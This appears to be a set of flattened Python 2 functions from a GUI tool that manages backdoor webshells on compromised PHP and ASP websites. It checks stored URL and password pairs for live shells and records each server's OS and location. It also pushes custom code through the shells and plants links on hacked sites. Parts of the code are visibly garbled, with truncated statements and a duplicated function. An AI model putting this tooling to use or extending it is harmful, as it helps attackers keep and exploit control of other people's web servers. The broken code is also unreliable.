def php_cs_js(self): self.ui.main_pushButton_PHP.setEnabled(0) #给改成禁用 int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号 model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = data.toString() PHP_data=self.ui.textEdit_PHP_data.toPlainText() #获取内容 self.write2file("data.php",PHP_data) PHP_data=str(PHP_data) #.decode('utf-8').encode('gbk') PHP_data=self.x0_zs(PHP_data) #清除注释<?php ?> PHP_data=self.x1_zs(PHP_data) #清除注释/* */ PHP_data=self.x2_zs(PHP_data) #清除//注释 PHP_data=self.open_file_null(PHP_data) #清除空行 #print PHP_data for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index=index.row()#获取行号 s0=,0)).toString() s1=,1)).toString() #s0="http://localhost/long.php" #s1="long123" if g.bool_asp_php(s0)=="php": fiel_data=self.yijuhua_php_js(str(s0),str(s1),str(PHP_data)) data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data)) #HTML内容 self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data) #写入文件 except BaseException, e: print(str(e)) self.ui.main_pushButton_PHP.setEnabled(1) return 0
def ASP_cs_js(self): self.ui.main_pushButton_ASP.setEnabled(0) #给改成禁用 int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号 model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = data.toString() ASP_data=self.ui.textEdit_ASP_data.toPlainText() #获取内容 self.write2file("data.asp",ASP_data) ASP_data=str(ASP_data) #.decode('utf-8').encode('gbk') ASP_data=self.asp_x0_zs(ASP_data) #清除<% %> ASP_data=self.asp_x2_zs(ASP_data) #清除'注释 ASP_data=self.open_file_null(ASP_data) #清除空行 ASP_data=self.asp_x2_zs(ASP_data) #清除'注释 #print ASP_data for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index=index.row()#获取行号 s0=,0)).toString() s1=,1)).toString() # s0="" # s1="long123" if g.bool_asp_php(s0)=="asp": fiel_data=self.yijuhua_ASP_js(str(s0),str(s1),str(self.str_char(ASP_data))) #print fiel_data data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data)) #HTML内容 self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data) #写入文件 except BaseException, e: print(str(e)) self.ui.main_pushButton_ASP.setEnabled(1) return 0
def yjh_cs_2(self): #测试一句话是否连接成功 global yu_2, yu_3 self.ui.main_pushButton_2.setEnabled(0) #给改成禁用 int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号 model = self.ui.SQLite_tableView.model( ) #index = model.index(3,1)#data = data.toString() h = qqwry.C_hoset() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 =, 0)).toString() s1 =, 1)).toString() data_time2 = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) data_time = time.mktime( time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳 if s0 == "" or len(s0) <= 7: yu_3 += 1 #失败多少条 self.tableView_add(int_index, None, None, u"null", None, None, None, None, None, None, data_time2) #添加数据 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 # url="" # PASS="******" if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): yu_2 += 1 #成功多少条 #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据 #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1)) #yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统 win_linux = yijuhua.yijuhua_win_linux( str(s0), str(s1)) #URL地址 ,密码 返回操作系统 WLWZ = h.www_data(qqwry.url_www(str(s0))) WLWZ = u"%s" % (WLWZ) if g.bool_asp_php(str(s0)) == "asp": win_linux = "WinNT" self.tableView_add(int_index, None, None, u"ok", str(win_linux), None, None, None, WLWZ, None, data_time2) #添加数据 sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( str(win_linux), WLWZ, data_time, str(s0), str(s1)) else: yu_3 += 1 #失败多少条 self.tableView_add(int_index, None, None, u"No", u"No", None, None, None, None, None, data_time2) #添加数据 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) except BaseException, e: print(str(e)) self.ui.main_pushButton_2.setEnabled(1) return 0
def db_cs(self, ID): #测试还没有测试过的一句话 try: global yu_1, yu_2, yu_3 sql_data = "" if ID == 0: sql_data = "select * from shell where zts3 is null" if ID == 1: sql_data = "select * from shell where zts3='ok'" if ID == 2: sql_data = "select * from shell where zts3='No'" self.sql3.conn.commit() # 获取到游标对象 cur = self.sql3.conn.cursor() # 用游标来查询就可以获取到结果 cur.execute(sql_data) # 获取所有结果 res = cur.fetchall() #从结果中取出所有记录 for line in res: s0 = str(line[0]) s1 = str(line[1]) data_time2 = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) data_time = time.mktime( time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳 if s0 == "" or len(s0) <= 7: yu_3 += 1 #失败多少条 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): yu_2 += 1 #成功多少条 win_linux = yijuhua.yijuhua_win_linux( str(s0), str(s1)) #URL地址 ,密码 返回操作系统 WLWZ = self.h.www_data(qqwry.url_www(str(s0))) WLWZ = u"%s" % (WLWZ) if g.bool_asp_php(str(s0)) == "asp": win_linux = "WinNT" sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( str(win_linux), WLWZ, data_time, str(s0), str(s1)) self.br_pr_sogo(s0, s1) #获取 百度 谷歌 搜狗 权重 print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0), str(s1), WLWZ) self.messagebox() else: yu_3 += 1 #失败多少条 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.messagebox() print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) except BaseException, e: print(str(e)) return 0
def webshell_url(self): try: if Class_Queue.webscan_url.empty(): #判断队列是否为空 print u"thread:%d webscan_url 已经没有可操作的URL了" % (self.TH) time.sleep(60) URL = Class_Queue.webscan_url.get(0.5) #get()方法从队头删除并返回一个项目 url = URL.split("|") if len(url) <= 1: return 0 #url[0],url[1] if g.bool_asp_php(url[0]) == "php": data = u"thread:%d url:%s passwod:%s" % (self.TH, url[0], url[1]) if eval.cs(url[0], url[1]): print u"php_ok.txt%s 链接成功" % (data) websehll = "%s|%s" % (url[0], url[1]) self.TXT_file_add("php_ok.txt", str(websehll)) self.php_webshell(url[0], url[1]) #PHP处理WEBSHELL 挂链 return 0 else: websehll = "%s|%s" % (url[0], url[1]) self.TXT_file_add("php_no.txt", str(websehll)) print u"php_no.txt%s 链接失败" % (data) return 0 if g.bool_asp_php(url[0]) == "asp": websehll = "%s|%s" % (url[0], url[1]) self.TXT_file_add("asp_ok.txt", str(websehll)) return 0 else: websehll = "%s|%s" % (url[0], url[1]) self.TXT_file_add("asp_no.txt", str(websehll)) if g.bool_asp_php(url[0]) == "null": websehll = "%s|%s" % (url[0], url[1]) self.TXT_file_add("null.txt", str(websehll)) return 0 except Exception, e: #print e return 0
def br_pr_sogo_4(self): #查询\WEBSHELL 状态 self.ui.pb_pushButton_1.setEnabled(0) #给改成禁用 int_model = self.ui.tableView.selectionModel() #获取选中编号 model = self.ui.tableView.model( ) #index = model.index(3,1)#data = data.toString() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 =, 0)).toString() s1 =, 1)).toString() if s0 == "" or len(s0) <= 7: self.tableView_add(int_index, None, None, u"null") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 #print str(s0) if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): win_linux = "WinNT" if g.bool_asp_php(s0) == "php": win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1)) www_wlwz = yijuhua.www_wlwz(str(s0)) self.tableView_add(int_index, None, None, u"ok", str(win_linux), None, None, www_wlwz) #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % ( str(win_linux), urllib.quote( str(www_wlwz)), str(s0), str(s1)) else: self.tableView_add(int_index, None, None, u"No") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) #print sql_data self.sql3.mysqlite3_update(sql_data) except BaseException, e: pass
def br_pr_sogo_4(self): #查询\WEBSHELL 状态 self.ui.pushButton_4.setEnabled(0) #给改成禁用 int_model = self.ui.tableView.selectionModel() #获取选中编号 model = self.ui.tableView.model( ) #index = model.index(3,1)#data = data.toString() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 =, 0)).toString() s1 =, 1)).toString() if s0 == "" or len(s0) <= 7: self.tableView_add(int_index, None, None, u"null") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 #print str(s0) if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据 #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1)) #yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统 self.tableView_add(int_index, None, None, u"ok") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) else: self.tableView_add(int_index, None, None, u"No") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) #print sql_data self.sql3.mysqlite3_update(sql_data) except BaseException, e: pass